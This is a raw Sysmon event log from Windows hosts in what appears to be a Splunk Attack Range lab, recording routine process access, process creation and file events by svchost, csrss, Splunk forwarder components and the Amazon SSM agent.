10:44:49.339{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215618Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:49.339{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215617Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:49.339{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1021-6216-3104-000000003902}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215616Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:49.339{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1021-6216-3104-000000003902}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215615Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:49.339{4F8D34B0-1021-6216-3104-000000003902}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215614Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:49.107{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-128MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:50.617{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E50F70DE3EED118B2534739DA1508CF,SHA256=B40CBB064D072BF02DFD9D96B7E71CB45DC16FCDC52FE7B7736F51D1DE8CF3F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215646Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.729{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F91DAEB904096C8BD79D2C9C1FF27B14,SHA256=E2BB2CDC83027F7A5DC1AB0D3EC6E768AC23E1F57591A74C7AB86CE701AC692B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:48.622{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53353-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000215645Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.383{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CF91AE819950993F8D8C9243F57E4F77,SHA256=6987873330C529FD38DEF7E7C894F29A614A9BA91B7BF0144127CDB28D0EE03B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215644Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.227{4F8D34B0-1022-6216-3204-000000003902}16442492C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000215643Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.121{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-129MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215642Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.010{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1022-6216-3204-000000003902}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215641Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215640Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215639Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215638Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215637Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215636Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215635Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215634Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215633Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.010{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1022-6216-3204-000000003902}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215632Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215631Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.010{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1022-6216-3204-000000003902}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215630Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:50.011{4F8D34B0-1022-6216-3204-000000003902}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:51.632{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B15B2A80AC243E4CE6E8710181E78251,SHA256=28449F680D83A23B7099F5E9C477528B9E8F399869A24B1B31F092C8AD6C7201,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215660Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:51.760{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EE1FD440C5646E9A3AE9B1547276742,SHA256=DE516E2A5AAF0DEB4C0A5A2A4A409E6FBCBC9C11FD0989E125D88C323A865A1A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215659Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:51.510{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1023-6216-3304-000000003902}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215658Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:51.510{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215657Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:51.510{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215656Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:51.510{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|